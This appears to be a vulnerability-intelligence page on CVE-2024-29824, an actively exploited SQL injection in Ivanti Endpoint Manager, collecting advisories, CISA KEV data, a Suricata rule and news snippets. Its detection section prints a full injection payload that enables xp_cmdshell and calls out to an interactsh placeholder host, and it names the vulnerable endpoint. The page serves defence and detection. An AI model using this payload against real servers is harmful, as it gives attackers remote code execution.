CVE-2024-29824
published 2024-05-31CVE-2024-29824: An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to…
PriorityP192high8.8CVSS 3.1
AVAACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-10-23
Exploited in the wild
EPSS
99.95%
100.0th percentile
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | endpoint_manager | < 2022 | 2022 |
| ivanti | endpoint_manager | — | — |
| ivanti | epm | 2022 SU5 – 2022 SU5 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandGoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--↗
- →Review MS SQL logs for evidence of xp_cmdshell being used to obtain command execution on Ivanti EPM servers. ↗
- →The SQL injection payload targets PatchBiz.dll via the EPM Core server; monitor for SQLi patterns in traffic to this component. ↗
- →Detect exploitation attempts by monitoring POST requests to /WSStatusEvents/EventHandler.asmx with SOAP content-type containing SQL injection strings (e.g., sp_configure, xp_cmdshell) in the body. ↗
- →Check Point IPS signature available for this vulnerability; deploy the named rule for network-level detection. ↗
- →The Nuclei template confirms exploitation by matching 'UpdateStatusEventsResponse' in the HTTP response body and a DNS interaction via interactsh, indicating successful xp_cmdshell execution. ↗
- ·Exploitation requires the attacker to be on the same network as the Ivanti EPM Core server (adjacent network attack vector, AV:A); this is not a remotely exploitable vulnerability from the internet. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.6CRITICALCVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qr27-wgh8-6hcg: An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network
ghsa_unreviewed·2024-05-31
CVE-2024-29824 [CRITICAL] CWE-89 GHSA-qr27-wgh8-6hcg: An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
VulnCheck
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
vulncheck·2024·CVSS 8.8
CVE-2024-29824 [HIGH] CWE-89 Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
Affected: Ivanti Endpoint Manager (EPM)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-19&host_type=src&vulnerability=cve-2024-29824; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-20&host_type=src&vulnerability=cve-2024-29824; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-21&host_type=src&vuln
CISA
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
cisa·2024-10-02·CVSS 8.8
CVE-2024-29824 [HIGH] CWE-89 Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Vulnerability: Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Affected: Ivanti Endpoint Manager (EPM)
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://forums.ivanti.com/s/article/Security-Advisory-May-2024 ; https://nvd.nist.gov/vuln/detail/CVE-2024-29824
Remediation Due Date: 2024-10-23
Ivanti
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
vendor_ivanti·2024-10-02·CVSS 8.8
CVE-2024-29824 [HIGH] Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
CVE IDs: CVE-2024-29824
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Remediation Due Date: 2024-10-23
Suricata
ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824)
suricata·2024-10-02·CVSS 8.8
CVE-2024-29824 [HIGH] ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824)
ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/WSStatusEvents/EventHandler.asmx"; fast_pattern; http.content_type; content:"application/soap+xml"; http.request_body; content:"md5="; pcre:"/^[^\x3c]*?(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:url,www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/; reference:cve,2024-29824; classtype:web-application-attack; sid:2056391; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_02, cve CVE_2024_29824, deployme
Metasploit
Ivanti EPM RecordGoodApp SQLi RCE
metasploit
Ivanti EPM RecordGoodApp SQLi RCE
Ivanti EPM RecordGoodApp SQLi RCE
Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.
Nuclei
Ivanti EPM - Remote Code Execution
nuclei·CVSS 8.8
CVE-2024-29824 [HIGH] Ivanti EPM - Remote Code Execution
Ivanti EPM - Remote Code Execution
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Template:
id: CVE-2024-29824
info:
name: Ivanti EPM - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
impact: |
Attackers can execute arbitrary code on the Ivanti EPM server, leading to complete system compromise.
remediation: |
Apply security updates for Ivanti EPM that address CVE-2024-29824.
reference:
- https://github.com/horizon3ai/CVE-2024-29824
- https://nvd.nist.gov/vu
Bleepingcomputer
CISA: Recently patched Ivanti EPM flaw now actively exploited
blogs_bleepingcomputer·2026-03-10·CVSS 8.6
CVE-2026-1603 [HIGH] CISA: Recently patched Ivanti EPM flaw now actively exploited
## CISA: Recently patched Ivanti EPM flaw now actively exploited
## Sergiu Gatlan
CISA flagged a high-severity Ivanti Endpoint Manager (EPM) vulnerability as actively exploited in attacks and ordered U.S. federal agencies to patch systems within three weeks.
Ivanti's EPM software is an all-in-one endpoint management solution for managing client devices across Windows, macOS, Linux, Chrome OS, and IoT platforms.
Tracked as CVE-2026-1603 , this security flaw can be exploited by remote threat actors without privileges to bypass authentication and steal credential data in low-complexity cross-site scripting attacks that require no user interaction.
Ivanti patched the vulnerability one month ago , when it released Ivanti EPM 2024 SU5, which also addresses an SQL injection flaw that allows
Bleepingcomputer
Ivanti warns of critical Endpoint Manager code execution flaw
blogs_bleepingcomputer·2025-12-09·CVSS 9.6
[CRITICAL] Ivanti warns of critical Endpoint Manager code execution flaw
## Ivanti warns of critical Endpoint Manager code execution flaw
## Sergiu Gatlan
American IT software company Ivanti warned customers today to patch a newly disclosed vulnerability in its Endpoint Manager (EPM) solution that could allow attackers to execute code remotely.
Ivanti delivers system and IT asset management solutions to over 40,000 companies via a network of more than 7,000 organizations worldwide. The company's EPM software is an all-in-one endpoint management tool for managing client devices across popular platforms, including Windows, macOS, Linux, Chrome OS, and IoT.
Tracked as CVE-2025-10573 , this critical security flaw can be exploited by remote, unauthenticated threat actors to execute arbitrary JavaScript code through low-complexity cross-site scripting attacks tha
Fortinet
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs
blogs_fortinet·2024-10-11·CVSS 7.2
[HIGH] Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
Background
Vulnerabilities Overview and Disclosure
Vulnerabilities Details
Other Findings
Conclusion
Fortinet Protections
MITRE Mapping
IOCs
Network Based Indicators
Host Based Indicators
By Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans and Robert Reyes | October 11, 2024
Affected Platforms: Ivanti Cloud Services Appliance version 4.6 and prior
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Today FortiGuard Labs is releasing this blog post about a case where an advanced adversary was observed exploiting three vulnerabilities affecting the Ivanti Cloud Services Appli
Checkpoint
7th October– Threat Intelligence Report
blogs_checkpoint·2024-10-07
CVE-2024-45519 7th October– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 7th October– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 7th October, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Chinese state-sponsored hackers, dubbed “Salt Typhoon”, infiltrated US telecom companies such as Verizon, AT&T, and Lumen Technologies. The attackers gained access to systems used for court-authorized wiretaps, potentially remaining undetected for months while collecting sensitive information.
French press agency AFP has di
Bleepingcomputer
Critical Ivanti RCE flaw with public exploit now used in attacks
blogs_bleepingcomputer·2024-10-02·CVSS 8.8
CVE-2024-29824 [HIGH] Critical Ivanti RCE flaw with public exploit now used in attacks
## Critical Ivanti RCE flaw with public exploit now used in attacks
## Sergiu Gatlan
CISA warned today that a critical Ivanti vulnerability that can let threat actors gain remote code execution on vulnerable Endpoint Manager (EPM) appliances is now actively exploited in attacks.
Ivanti EPM is an all-in-one endpoint management solution that helps admins manage client devices on various platforms, including Windows, macOS, Chrome OS, and IoT operating systems.
Tracked as CVE-2024-29824 , this SQL Injection vulnerability in Ivanti EPM's Core server that unauthenticated attackers within the same network can exploit to execute arbitrary code on unpatched systems.
Ivanti released security updates to patch this security flaw in May , when it also addressed five other remote code execution bu
Greynoiseio
NoiseLetter June 2024
blogs_greynoiseio
NoiseLetter June 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2024-05-31
Published
2024-10-02
Added to CISA KEV
Exploited in the wild